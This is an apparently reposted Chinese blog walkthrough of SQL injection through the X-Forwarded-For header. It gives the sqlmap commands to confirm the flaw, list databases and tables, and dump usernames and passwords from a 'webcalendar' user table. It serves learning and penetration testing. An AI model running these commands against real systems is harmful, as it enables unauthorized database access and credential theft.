爆庫記錄（X-Forwarded-For注入漏洞實戰記錄）

本文轉載自查看原文 2019-09-15 14:59 453 SQLmap

獲取登陸地址的請求信息

往請求頭信息加入X-Forwarded-For:*

一起寫入保存到本地txt文件 123.txt

執行sqlmap

搜索看有沒有漏洞

sqlmap.py -r /Users/lucax/Desktop/123.txt

出現:（存在可以注入）

獲取當前用戶權限

sqlmap.py -r /Users/lucax/Desktop/123.txt --current-user

獲取當前數據庫庫名

sqlmap.py -r /Users/lucax/Desktop/123.txt --dbs

獲取數據庫表名

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar --tables

獲取表里面的字段名

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user --columns

獲取字段對應的值

sqlmap.py -r /Users/lucax/Desktop/123.txt -D webcalendar -T user -C id,username,password --dump

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 HTTP頭注入漏洞測試(X-Forwarded-for)--手動注入 CTF—攻防練習之HTTP—SQL注入(X-forwarded-For) tomcat記錄X-Forwarded-For字段中的遠程IP X-Forwarded-For (IIS日志記錄用戶真實IP) HTTP 請求頭中的 X-Forwarded-For http獲取客戶端真實ip的原理及利用X-Forwarded-For偽造客戶端IP漏洞成因及防范 X-Forwarded-For 和 X-Real-IP 的區別 Java 過濾器獲取get參數和post請求json參數（還有ip，X-Forwarded-For）存入數據庫 Nginx做代理時X-Forwarded-For信息頭的處理你確信 X-Forwarded-For 拿到的就是用戶真實 IP 嗎？